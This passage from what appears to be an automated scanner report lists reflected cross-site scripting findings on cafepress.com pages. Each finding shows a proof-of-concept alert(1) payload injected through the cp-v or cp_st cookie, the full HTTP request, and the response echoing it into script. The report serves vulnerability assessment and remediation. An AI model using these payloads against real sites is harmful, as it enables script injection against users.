__utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA48b1e"-alert(1)-"48ef400b324 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 59192 Date: Sun, 26 Dec 2010 13:48:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59192 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA48b1e"-alert(1)-"48ef400b324 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.49. http://www.cafepress.com/+magnets [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+magnets
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1a93</script><script>alert(1)</script>a21dc3c1ba6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+magnets HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f1a93</script><script>alert(1)</script>a21dc3c1ba6 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 59206 Date: Sun, 26 Dec 2010 13:48:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/ Set-Cookie: cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59206 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'f1a93</script><script>alert(1)</script>a21dc3c1ba6 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.50. http://www.cafepress.com/+mousepads [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+mousepads
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2de4"-alert(1)-"8af102be85f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+mousepads HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAe2de4"-alert(1)-"8af102be85f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 56880 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 56880 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe2de4"-alert(1)-"8af102be85f "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.51. http://www.cafepress.com/+mousepads [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+mousepads
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6760</script><script>alert(1)</script>1c00c257e15 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+mousepads HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a6760</script><script>alert(1)</script>1c00c257e15 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 56907 Date: Sun, 26 Dec 2010 13:48:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:54 GMT; path=/ Set-Cookie: cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:54 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 56907 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'a6760</script><script>alert(1)</script>1c00c257e15 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.52. http://www.cafepress.com/+mugs [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+mugs
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49177"-alert(1)-"acf862ea6e2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+mugs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA49177"-alert(1)-"acf862ea6e2 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 60103 Date: Sun, 26 Dec 2010 13:47:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:33 GMT; path=/ Set-Cookie: cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:33 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60103 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA49177"-alert(1)-"acf862ea6e2 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.53. http://www.cafepress.com/+mugs [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+mugs
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6774f</script><script>alert(1)</script>147c0c0a55c was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+mugs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=6774f</script><script>alert(1)</script>147c0c0a55c ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
